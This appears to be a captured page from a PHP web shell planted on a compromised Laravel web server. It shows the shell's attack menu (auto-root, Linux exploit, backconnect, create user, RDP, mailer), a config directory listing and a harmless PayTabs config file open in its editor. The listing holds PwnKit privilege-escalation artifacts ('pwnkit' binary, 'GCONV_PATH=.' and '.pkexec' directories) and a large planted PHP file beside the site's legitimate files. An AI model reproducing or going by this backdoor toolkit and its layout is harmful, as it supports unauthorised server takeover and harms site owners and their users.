Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.20
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo21.com /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.htaccess
127
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
app.php
4.91
KB
-rw-rw-r--
auth.php
3.93
KB
-rw-rw-r--
cache.php
3.39
KB
-rw-rw-r--
database.php
6.11
KB
-rw-rw-r--
dateformat.php
956
B
-rw-rw-r--
error_log
7.45
KB
-rw-r--r--
filesystems.php
2.44
KB
-rw-rw-r--
goat1.php
143.87
KB
-rw-r--r--
inertia.php
2.95
KB
-rw-rw-r--
installer.php
5.46
KB
-rw-rw-r--
larabug.php
4.11
KB
-rw-rw-r--
laravel-impersonate.php
951
B
-rw-rw-r--
logging.php
4.48
KB
-rw-rw-r--
mail.php
3.46
KB
-rw-rw-r--
media-library.php
6.04
KB
-rw-rw-r--
openai.php
1.23
KB
-rw-rw-r--
paytabs.php
1.69
KB
-rw-rw-r--
permission.php
6.99
KB
-rw-rw-r--
pwnkit
10.99
KB
-rwxr-xr-x
queue.php
3.73
KB
-rw-rw-r--
role-permissions.php
669
B
-rw-rw-r--
services.php
1.08
KB
-rw-rw-r--
session.php
7.67
KB
-rw-rw-r--
timeformat.php
388
B
-rw-rw-r--
timezones.php
30.44
KB
-rwxrwxr-x
verification.php
74
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : paytabs.php
<?php /* * This file is part of paytabs. * * (c) Walaa Elsaeed <w.elsaeed@paytabs.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ return [ /* |-------------------------------------------------------------------------- | Merchant profile id |-------------------------------------------------------------------------- | | Your merchant profile id , you can find the profile id on your PayTabs Merchant’s Dashboard- profile. | */ 'profile_id' => env('paytabs_profile_id', null), /* |-------------------------------------------------------------------------- | Server Key |-------------------------------------------------------------------------- | | You can find the Server key on your PayTabs Merchant’s Dashboard - Developers - Key management. | */ 'server_key' => env('paytabs_server_key', null), /* |-------------------------------------------------------------------------- | Currency |-------------------------------------------------------------------------- | | The currency you registered in with PayTabs account you must pass value from this array ['AED','EGP','SAR','OMR','JOD','US'] | */ 'currency' => env('paytabs_currency', null), /* |-------------------------------------------------------------------------- | Region |-------------------------------------------------------------------------- | | The region you registered in with PayTabs you must pass value from this array ['ARE','EGY','SAU','OMN','JOR','GLOBAL'] | */ 'region' => env('paytabs_region', null), ];
Close